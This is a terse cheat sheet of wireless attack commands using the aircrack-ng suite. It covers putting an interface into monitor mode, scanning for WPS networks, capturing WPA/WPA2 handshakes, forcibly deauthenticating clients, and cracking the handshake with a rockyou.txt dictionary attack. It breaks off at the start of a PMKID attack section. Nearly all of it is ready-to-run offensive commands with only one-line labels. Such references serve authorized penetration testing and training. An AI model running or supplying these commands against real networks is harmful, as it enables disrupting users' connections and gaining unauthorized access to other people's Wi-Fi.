📡Wireless attacks

View the configuration of network interfaces:

ifconfig && iwconfig && airmon-ng

Turn a network interface on/off:

ifconfig wlan0 up

ifconfig wlan0 down

Restart the network manager:

service NetworkManager restart

Set the WLAN regulatory domain:

iw reg set HR

Turn the power of a wireless interface up/down (too high can be illegal in some countries):

iwconfig wlan0 txpower 40

Set a wireless network interface to the monitoring mode:

airmon-ng start wlan0

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Set a wireless network interface to the monitoring mode on a specified channel:

airmon-ng start wlan0 8

iwconfig wlan0 channel 8

[Optional] Kill services that might interfere with wireless network interfaces in the monitoring mode:

airmon-ng check kill

Set a wireless network interface back to the managed mode:

airmon-ng stop wlan0mon

ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up

Search for WiFi networks within your range:

airodump-ng --wps -w airodump_sweep_results wlan0mon

wash -a -i wlan0mon

Monitor a WiFi network to capture handshakes/requests:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

Check if a wireless interface supports packet injection:

aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Monitor a WiFi network to capture a WPA/WPA2 4-way handshake:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

Deauthenticate clients from a WiFi network:

aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Start the dictionary attack against a WPA/WPA2 handshake:

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap

PMKID Attack: Crack the WPA/WPA2 authentication without deauthenticating clients.

apt-get update && apt-get -y install hcxtools